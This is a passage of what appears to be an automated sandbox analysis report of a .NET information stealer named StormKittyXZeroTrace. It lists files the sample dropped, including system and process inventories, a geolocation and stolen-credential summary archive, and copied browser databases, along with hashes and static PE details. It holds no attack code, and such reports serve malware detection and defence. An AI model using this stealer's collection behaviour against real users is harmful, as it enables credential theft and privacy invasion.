SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5791
Entropy (8bit):	5.25353157181917
Encrypted:	false
SSDEEP:	96:l8qM+aaZelXlJMplDMW+BWJaNy0bkmkdRejiZSB0MjK9t2WUw7ntC34iGVRY:cNQatbRku3B9m/XpDiKRY
MD5:	502032883CF174A4D6603DAD51669FA4
SHA1:	614160854082CCF552B959CD61AE692CA0D4C9DB
SHA-256:	39950AFF5E754ADB5BA2204F4CFFA0D9D90F6FE107139146BC530A9AE1666E88
SHA-512:	58ACCC4C4DE34DF26F7A71FABD7974E1830C6C203510ED09C5C0C0E43A94993F0F7C0D2C40677493C84689AA0794A95B5593E2BA4912BD1910C7914A348844FD
Malicious:	false
Preview:	Temp\...8.46.123.189\....Directories\.....Desktop.txt.....Documents.txt.....Downloads.txt.....OneDrive.txt.....Pictures.txt.....Startup.txt.....Videos.txt....System\.....Process.txt...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-42-34-020.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 09-53-40-267.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 09-53-55-791.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696492126647891800_C77A0801-BF9E-4A77-B306-ADE600D7D503.log.....App1696492150176198700_7F03E0AD-1FF3-47CB-9F3F-97D0C5C0A24B.log.....App1696492161568813800_487416EE-F98F-4B97-8774-47B986A4D1F6.log.....App1696492161569268300_487416EE-F98F-4B97-8774-47B986A4D1F6.log...edge_BITS_3244_1042373222\....376d5b20-4ccf-4ab3-92ec-d2fa66fb039b...edge_BITS_3244_1077422325\....464

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\Temp\8.46.123.189\System\Info.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	384
Entropy (8bit):	5.423075907604979
Encrypted:	false
SSDEEP:	6:R0UUtL558mXRNhVRJvcbUveLlRo1iSj1h4BjA9YuJ+B6T5QgPZxwzODy8A7/n:R0UwPRbVkb2GcTxa2YG26TPPjjyR
MD5:	4EDA79084973FEAFBC5FDC2A6B3FE46D
SHA1:	CAC8D2F9211AC4EB7FACB8448CB314C8287EF171
SHA-256:	5B11AE76F9EE5F867B6DF2DE64B2F8F5466A7F7EBE51C9487A3BEDB719E4108B
SHA-512:	460098E1FA95C5A19C95D553A3FB2301D48C1E13BE39E8AE4A328A68660A10CFE6F9160030A4725F3A23063D0F85C5CBCEE8208A29DADD049FF8CA180F037E88
Malicious:	false
Preview:	.[IP].Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 887849.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: NB7XH911T.RAM: 4095MB.DATE: 2025-03-14 9:23:26 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%)..[Virtualization].Antivirus: Windows Defender.

C:\Users\user\AppData\Local\Temp\8.46.123.189\System\Process.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17071
Entropy (8bit):	5.78784359031659
Encrypted:	false
SSDEEP:	192:tTE79MRnOtGsrKwjFwS/xOlxJJVpn1WVgzEV2:tTE79MRwFwHxJ9IVgzEQ
MD5:	A824D24F5094658AEB4625427A3E590F
SHA1:	A5BF292CF3D7C707FC44C97790432AD7A863728A
SHA-256:	4A662B73A177C2A683C15B0B37EB7FB5587D05B0E0E6A9EB97D147DFF266D550
SHA-512:	D8B0A64E0ECCB9515D7E3B6DFDF822C791D4C7022705DB721AE52A23DE979FE2CA86D6403006ABD1C34F9DC5ECF280CF695CB1835352DC3115A82C5516E71397
Malicious:	false
Preview:	NAME: XxvqT8RoE1Y5kJdC..PID: 2584..EXE: C:\Program Files (x86)\bFJIiLrqnaxCnTPSAyPpkBXsMSNfWjqOXaOfQDPiOKlTfOfAPcGCSRFOnPQAtbD\XxvqT8RoE1Y5kJdC.exe..NAME: RuntimeBroker..PID: 4732..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: WoOMpDVXNlpF9W8kJDVQ..PID: 6024..EXE: C:\Program Files (x86)\bFJIiLrqnaxCnTPSAyPpkBXsMSNfWjqOXaOfQDPiOKlTfOfAPcGCSRFOnPQAtbD\WoOMpDVXNlpF9W8kJDVQ.exe..NAME: a1ytUEQUXsl..PID: 6452..EXE: C:\Program Files (x86)\bFJIiLrqnaxCnTPSAyPpkBXsMSNfWjqOXaOfQDPiOKlTfOfAPcGCSRFOnPQAtbD\a1ytUEQUXsl.exe..NAME: 72vi8019soKN..PID: 6020..EXE: C:\Program Files (x86)\bFJIiLrqnaxCnTPSAyPpkBXsMSNfWjqOXaOfQDPiOKlTfOfAPcGCSRFOnPQAtbD\72vi8019soKN.exe..NAME: dllhost..PID: 6880..EXE: C:\Windows\system32\DllHost.exe..NAME: svchost..PID: 5156..EXE: C:\Windows\System32\svchost.exe..NAME: FoXzKhJs..PID: 2568..EXE: C:\Program Files (x86)\bFJIiLrqnaxCnTPSAyPpkBXsMSNfWjqOXaOfQDPiOKlTfOfAPcGCSRFOnPQAtbD\FoXzKhJs.exe..NAME: csrss..PID: 412..EXE: ..NAME: sihost..PID: 3424..EXE: C:\Windows\system

C:\Users\user\AppData\Local\Temp\8.46.123.189\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4966
Entropy (8bit):	5.380260613560042
Encrypted:	false
SSDEEP:	48:E64Hynvzqd5nzaoNQGF3O1cJKGl64hSkhhKmVYf:E64HyynzlQq8cb64hSkj3Q
MD5:	148A42B84B96F28AB65E7351D4778065
SHA1:	61CC6F7810B8E1D494E2C30C56F7B41B3CC35E41
SHA-256:	8EEB5806656BA1A90590A684E1473583F324635B73CD5A758B16C3A63C60A8FD
SHA-512:	AA857DD07E6EFAC369A9196966C713A58E00E08632DE4F26963CBDB8C2BBF44F74EDCB4FF8FED3FE3E0A21CEA068BA487107D367665C1B66B7418D742B4797C9
Malicious:	false
Preview:	NAME: XxvqT8RoE1Y5kJdC..TITLE: New Tab - Google Chrome..PID: 2584..NAME: WoOMpDVXNlpF9W8kJDVQ..TITLE: New Tab - Google Chrome..PID: 6024..NAME: a1ytUEQUXsl..TITLE: New Tab - Google Chrome..PID: 6452..NAME: 72vi8019soKN..TITLE: New Tab - Google Chrome..PID: 6020..NAME: FoXzKhJs..TITLE: New Tab - Google Chrome..PID: 2568..NAME: YOVNDLYf36EnQrtyDR..TITLE: New Tab - Google Chrome..PID: 6008..NAME: QvaK3j1r72XMCFhI..TITLE: New Tab - Google Chrome..PID: 6432..NAME: yOcrIv9yBsvXsTky..TITLE: New Tab - Google Chrome..PID: 820..NAME: ytEcinEChfCZk6..TITLE: New Tab - Google Chrome..PID: 5124..NAME: UiuuzrSt4W0cwCNX..TITLE: New Tab - Google Chrome..PID: 6412..NAME: mIdxC6160r..TITLE: New Tab - Google Chrome..PID: 4676..NAME: au6aHri4oVi1CNuL3LJYp..TITLE: New Tab - Google Chrome..PID: 6392..NAME: wilX0ONBFnoUG325XO..TITLE: New Tab - Google Chrome..PID: 5520..NAME: ua4DzgOr4XoxZ..TITLE: New Tab - Google Chrome..PID: 5516..NAME: 3cKyMjU5j5OyOUgF..TITLE: New Tab - Google Chrome..PID: 4020..NAME: R92Ao

C:\Users\user\AppData\Local\Temp\Extra.zip

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1860
Entropy (8bit):	5.032137970797663
Encrypted:	false
SSDEEP:	48:9gvzDgweItmRo97+EDvFHFwDxtjKU6vZK0dfdjQYld:YgatT+EzFHOFt2Uf0zvld
MD5:	604E348B554630ECCB64977A9C474519
SHA1:	703629A8F8EBF8B1864E9F64039E50BB1FE411E9
SHA-256:	5E234B31E6EF24B382A536715AD64B8F419FACBC5B91C5D934CAEE131860B5BE
SHA-512:	6E9919585B1F81E3B0CAA1874D69CA819FA65F65F35125842BD4BBAD9D2920E4E99DC86A67B0398EF1C025A9DBE1F64E5366205B82E4A1D1A418B3E88180EC14
Malicious:	false
Preview:	PK........7LnZ.\............H.Information.txt.. ................................... ..........3.....3.....3...... .. ----- Geolocation Data -----....IP: 8.46.123.189..Country: United States (US)..City: New York..Postal: 3356..MAC: EC:F4:BB:82:F7:E0.... ----- Hardware Info -----....Username: user\887849 ..Windows name: Windows 10 Enterprise x64..Hardware ID: d45b6331dc5f5d2854b3c0254cfd2f0c..GPU: NB7XH911T..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..RAM: 4 GB.... ----- Report Contents -----....Passwords: 0..Cookies: 0..Credit Cards: 0..AutoFills: 0..Extensions: 0..Wallets: 0..Files: 0.......... ----- Miscellaneous -----....Antivirus products: Windows Defender..File Loca

C:\Users\user\AppData\Local\Temp\tmp1B07.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	1.1353454741604
Encrypted:	false
SSDEEP:	192:elsfoVZkNi61n1ulH5mpX67oVuZVPqfPk:elsfoQx1n1ulH5umoVuZVPqfM
MD5:	D2A4025F32C5C6B3F294F7ECC10DD371
SHA1:	9EFC8B64F96F1D36D8C8AA14286B2FC8E0557C47
SHA-256:	D954F165A5E9B85DED33C1727606EA1A3209FA7E724493B4F64053E171DB414F
SHA-512:	5774023D161B6EB6495361A302F16681144FD12FBC3DE09DB6826EEAB28E2DC0FF36B966FB6BF064A6F7FF3DBA77E0148208FF3D4BA44297ADAAD8B656106296
Malicious:	false
Preview:	SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B46.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215401507481708
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:qq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	4B7413BC9D2D60F801777DE457B19F3D
SHA1:	708BBAC7E9CF6448CBA5AD64C0F7DCF4DFF3355F
SHA-256:	DB9A12C7F30F936B06EEED870E949CF9C2B67EEC18EEFAA62658CE1A8DA8FE19
SHA-512:	71F7472F7918F59BB17F82C6A4B784D6742E7E2683DE4C5D60186664A5E304A21EEF4F8C88E7FC852B207876EC9D3EE963F4805C329FD07F8A4B93A0E3C43021
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4E5D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4E8D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB2C2.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB2E2.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8616778647394084
Encrypted:	false
SSDEEP:	48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
MD5:	BDDE4AD11E732420E7ABCCA946B11611
SHA1:	278C3386A37BAFCA507CF4C128600B01B312DDA0
SHA-256:	099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
SHA-512:	B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE713.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, file counter 2, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	0.45909911068154247
Encrypted:	false
SSDEEP:	96:OpdTxQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:OpdT7IqL/tH+bF+UI3i67Kylj9
MD5:	89783266A93C429FCFB9CE049053FCCD
SHA1:	AC70D1404CB8588DBB685165154CA6FD01942CCE
SHA-256:	AF2420C3F982037DA346ACB0722E54A466547DCCFC54C44EA84FBC1401DC15BC
SHA-512:	BD3C480D62EDF9CA8F23BB17E39405E9EE2EE705EEE832F738D4C3AE5C16E3317A1822C07373CB49A8E704B3DA3D7BDC95544208C1C369322E7F8CE2E2DE93CF
Malicious:	false
Preview:	SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE752.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3046000, file counter 2, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	0.45909911068154247
Encrypted:	false
SSDEEP:	96:OpdTxQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:OpdT7IqL/tH+bF+UI3i67Kylj9
MD5:	89783266A93C429FCFB9CE049053FCCD
SHA1:	AC70D1404CB8588DBB685165154CA6FD01942CCE
SHA-256:	AF2420C3F982037DA346ACB0722E54A466547DCCFC54C44EA84FBC1401DC15BC
SHA-512:	BD3C480D62EDF9CA8F23BB17E39405E9EE2EE705EEE832F738D4C3AE5C16E3317A1822C07373CB49A8E704B3DA3D7BDC95544208C1C369322E7F8CE2E2DE93CF
Malicious:	false
Preview:	SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE773.tmp.dat

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	131658
Entropy (8bit):	5.4375461268544525
Encrypted:	false
SSDEEP:	3072:M++kDj4BST/k4ZYSTVcxhNraZI4RpTh6z6x0zW:jljLT/k4ZYSTVcxhNraZI4RpTh46AW
MD5:	139B90C653766045F820CAD6D86F46C6
SHA1:	4127781A4B306772EA1AF05C81FE5D64F0C013BE
SHA-256:	1D628D4D00C6F70ED19DB13769A875E817280ADBBD0563B9B71606FC4E5934E7
SHA-512:	3FCF4ED842F514287EC94D033EAF6C587B88826BA2E0A316A4B751D7ADCAD582370A16B461635CB2EF49238456B710E1E848D4359BBF6ED4E97976B68B1622E6
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (876)
Category:	downloaded
Size (bytes):	881
Entropy (8bit):	5.170827597486278
Encrypted:	false
SSDEEP:	24:3MRIWUxHi+OWa/9sBZBHslgT1d1uawBATjuNFMN2t2t2t2t2t2t2tomffffffo:8RSHVxa/9YKlgJXwBAvuNONYYYYYYYo9
MD5:	AB52414F437982F40B201F3D4F0398D4
SHA1:	E7266E85F1BA00AB1FE333888243D674C84A6AC6
SHA-256:	8056266CC22C83B6E9038310827240CDD7CB24E50EA3D87C6E1C2BFED366BB6B
SHA-512:	7A39966BC776594337E2E8777CF32877131E21D15712F52D9F0791D99014E4DB5AECBF6CA740412D114DAAF7F7E2FED915EFFA173A85CF5675664EBD7B29975A
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
Preview:	)]}'.["",["severance episode 9 recap","college football 26 cover","joann gift cards no longer accepted","avowed update patch notes","big bear bald eagles nest","open workout 25.3","wedding cake cookie cookie run","social security administration"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"-6545510826934349367","google:suggestrelevance":[1255,1254,1253,1252,1251,1250,701,700],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.929436857160787
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	StormKittyXZeroTrace.exe.bin.exe
File size:	218'624 bytes
MD5:	ae95df8dbc1fa111e8bdb7d071cf0db0
SHA1:	6775168a2ec9f696925ec251348d67f01e833dd7
SHA256:	897240fba0486e843c278d6033de055a2f185e15f700593b5a255146e8ab7fe7
SHA512:	d0cbc45241d2b7672981d78df6369a5b9960c14cccf54117c428249f3f095457d9ff6bb3ae0f40904084845c6bcee37359610fa68c417a65ba3a45e996b64608
SSDEEP:	6144:zgu0c4uUfX8fOVV+ZRH8rq7JrKbRG1EK1:zr0tPPg8rq7Jr1
TLSH:	93243A4473E80719E5BF9FB5A8B011508BB1F853AD76DB9D5CC520CA1AB2780E941BF3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..L...........j... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x436a2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAFE7C4AA [Mon Jul 9 10:19:22 2063 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
